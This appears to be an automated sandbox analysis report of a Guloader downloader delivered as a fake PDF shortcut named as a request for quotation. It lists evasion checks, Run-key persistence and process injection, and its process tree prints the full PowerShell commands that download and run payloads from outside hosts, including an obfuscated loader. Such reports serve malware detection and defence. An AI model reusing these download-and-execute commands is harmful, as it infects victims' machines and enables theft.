Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
27-06-2023 00:36
Static task
static1
Behavioral task
behavioral1
Sample
RFQ No 41 26_06_2023.pdf.lnk
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
RFQ No 41 26_06_2023.pdf.lnk
Resource
win10v2004-20230621-en
General
-
Target
RFQ No 41 26_06_2023.pdf.lnk
-
Size
2KB
-
MD5
ba180227c26bb151e9a9dddfb0a572af
-
SHA1
2e52688c2280c246bf931fd130184f86d411bc5d
-
SHA256
748c0ef7a63980d4e8064b14fb95ba51947bfc7d9ccf39c6ef614026a89c39e5
-
SHA512
55da00767297a830f6209ee685d0956ae1e2a42562efcb64a46d028bfadd0bc615538e523279cf7b45d453b19c461808673d530bb45924b1807422792da4bbc7
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 4896 powershell.exe 7 4896 powershell.exe 9 4896 powershell.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ielowutil.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Software\Microsoft\Windows\CurrentVersion\Run ielowutil.exe Set value (str) \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lymph = "%Della% -w 1 $Venlig=(Get-ItemProperty -Path 'HKCU:\\bdello\\').Unacquis;%Della% ($Venlig)" ielowutil.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3544 ielowutil.exe 3544 ielowutil.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2324 powershell.exe 3544 ielowutil.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2324 set thread context of 3544 2324 powershell.exe 113 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\Reilon.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 4896 powershell.exe 4896 powershell.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2324 powershell.exe 2324 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3544 ielowutil.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
pid Process 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 2324 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2232 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 3544 ielowutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3560 wrote to memory of 4896 3560 cmd.exe 82 PID 3560 wrote to memory of 4896 3560 cmd.exe 82 PID 3560 wrote to memory of 4896 3560 cmd.exe 82 PID 4896 wrote to memory of 2232 4896 powershell.exe 84 PID 4896 wrote to memory of 2232 4896 powershell.exe 84 PID 4896 wrote to memory of 2232 4896 powershell.exe 84 PID 4896 wrote to memory of 3768 4896 powershell.exe 85 PID 4896 wrote to memory of 3768 4896 powershell.exe 85 PID 4896 wrote to memory of 3768 4896 powershell.exe 85 PID 2232 wrote to memory of 180 2232 AcroRd32.exe 86 PID 2232 wrote to memory of 180 2232 AcroRd32.exe 86 PID 2232 wrote to memory of 180 2232 AcroRd32.exe 86 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 3516 180 RdrCEF.exe 87 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88 PID 180 wrote to memory of 4100 180 RdrCEF.exe 88
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\RFQ No 41 26_06_2023.pdf.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3560 -
\??\UNC\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"\\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" n; Invoke-WebRequest https://shorturl.at/iwAK9 -O C:\Users\Public\RFQ-INFO.pdf; C:\Users\Public\RFQ-INFO.pdf; Invoke-WebRequest https://shorturl.at/guDHW -O C:\Windows\Tasks\Reilon.vbs; C:\Windows\Tasks\Reilon.vbs2⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\RFQ-INFO.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:180 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D0C1A1371FE5BD4189A64546C8BE0F8 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3516
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C673A00B3112AF4B859E5221BD0C6EB0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C673A00B3112AF4B859E5221BD0C6EB0 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:15⤵PID:4100
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F976ACAEC40D434DF9AF8B49A5C4E62B --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4088
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=82D4D3CA2F6C5D4B7E04CD6963B67B2A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=82D4D3CA2F6C5D4B7E04CD6963B67B2A --renderer-client-id=5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job /prefetch:15⤵PID:4600
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C008F6B543B0A60AA9F99D9E6CBC7633 --mojo-platform-channel-handle=1892 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4168
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7EC02E8EAB0E600EF2FF7FF10EE3E955 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2636
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Reilon.vbs"3⤵
- Checks computer location settings
PID:3768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Milj379 ([String]$Endoph){For($Episper=1; $Episper -lt $Endoph.Length-1; $Episper+=(1+1)){$Ddvgt=$Endoph.Substring($Episper, 1);$Fald=$Fald+$Ddvgt}$Fald;}$Gydep=Milj379 ' h tntPp : / / 1 9L4 .T5P5 .A2 2k4T. 1 8P3I/KkEnTg /uPNeGrRsSuZa s iHvSe .TiEnPfT ';$Fald01=Milj379 'CiPeSxP ';$Stryger = Milj379 'N\hsByAsMwFo w 6A4N\ WIiCn dCo wFs PFo wKeFr S hJePlTlA\Fvt1P.R0 \ pPo wFe rSsSh eClClB.deAx e ';.($Fald01) (Milj379 'A$RA dAvGe rPt iMz eH2T=O$Ae nFvM:TwSiTnHdti rL ') ;.($Fald01) (Milj379 ' $ S tRr yTgCe r =E$IA dIv egrLtPiEz e 2C+P$ISktPr yTg eSrA ') ;.($Fald01) (Milj379 'K$BE x p l oCiEtE = T( (bgOwHmPia wSiSn 3H2Z_MpsrGo c eCs sF -UFC P r o cBe sDsAIRd = $ { PEIAD } ) .UC oTm mhaHnLdiL iBnUeH) -PsTpElCiAt [Hc h aBrL] 3K4P ');.($Fald01) (Milj379 ' $FU nCl aGcseFrK B=L M$PE x pFlWoOi t [ $ ETx p l oAiCtL.Hc o uCnStq-J2 ] ');.($Fald01) (Milj379 ' $ MLoBdHtSaBgAnB=O(BTBe s t - Pta t hP $BS t rBy g e r )C -BAMn dK T(K[AI nKtAP t r ]S: : sPiBzAe T-EeYqB 8L)j ') ;if ($Modtagn) {.$Stryger $Unlacer;} else {;$Fald00=Milj379 ' SAt aRr t -UBSiPt saTVr a n s fCeOrD F-YSfo uArIc e $sGTySdieDp S- D eAsKtSiNnPa t iBoDn S$IASd v e rAt i z e 2A ';.($Fald01) (Milj379 ' $BA dUv e r t i z e 2 = $ eGnTv :Na p ppd a t a ') ;.($Fald01) (Milj379 'PIam pMo rSt -AMCo d uOl e PB iBt sgTAr a nFsMf eSrB ') ;$Advertize2=$Advertize2+'\opbrugende.Dal';while (-not $Joyf) {.($Fald01) (Milj379 'N$KJ oRy fF=I( TUe sItS-FPLa tAhS $FA dKvFe rPtFiIzHeS2S)b ') ;.($Fald01) $Fald00;.($Fald01) (Milj379 'FS t a r t -FSClEeNenpB B5 ');}.($Fald01) (Milj379 'l$ M iAl j 3B7 B=B GMeVtB-SC oHn t e n tC U$TAHdsv eAr t i z eS2A ');.($Fald01) (Milj379 ' $ HSacmFa rDtI B=T L[ S y sNtUe m .mCAoEnGviemrBt ]G: : FHrNo mLB a s eH6 4 SSt r i n g ( $ MTi lMj 3N7 )R ');.($Fald01) (Milj379 's$OF aSlVd 2F M=m K[ES yKs tCe mH.PTkeBxTt .FE n cGo d iDn g ]I: : A S C IcIS. GFe t SStDr iJnsg ( $ H a mfa rAtF) ');.($Fald01) (Milj379 'P$FR a wBnCeTs sSa = $ F aRlFd 2 . sUuDbGs t rFiPnMgr(P1A9 3T5 3P9 , 1 9S2F7 1C) ');.($Fald01) $Rawnessa;}"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:5016
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:3628
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:4128
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:3400
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:4000
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:4324
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:3192
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:3784
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:1444
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:4236
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵PID:3844
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"5⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3544
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4004
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5fb956aeb5b8c60d3bcc950b760982d94
SHA116bfb1b290f8b69a57b38d63e5788b1ea0cf7067
SHA256e1a29a4a91410562ceacba01d24370e460e40ac9f1709fe9c4f939ef455b9fc8
SHA512341e7ee45812acb3b2d90ee1abad1922310c22244a552a08dd4a7ed459d0ef46ae9fb18bd5695037bf0338875690c0dfc508422ab97c8fe62c0b2229635dd282
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
533KB
MD5e418893ee8a2458d05377a7060cf1eaf
SHA1e53279ed7acde7c41f7691af8ca6309e0c84b39a
SHA256afbfc145affa16280139a70e92364d8cc9d71b951d3258df9a9855c0c1f1f567
SHA512fa77845192cee1a18f8d33b6131ed3cc142c89b35d2a72d1cbfd7c7b7e92cda6e3aac5bcb0dd95e5ef1e9574245037d4cc7a7c03c26757bbfa841b455b172e1e
-
Filesize
5KB
MD5afe0083b8897c6aea94517f1df6589fc
SHA10b24622ea072896e74ba8f35b965cbd5b1248a5f
SHA256ab6c5af91d0e384cc011f3e3be12b13290bfc802ce5dd8a3788100f583d4b800
SHA512ca449c9a49caa1a50a7c8c7805263063260db2e1e21cbae642fc3cf530a934e45b313fd9131c257c4a01d017234905648a81ee3edfcac9f2c28b65adf99afa32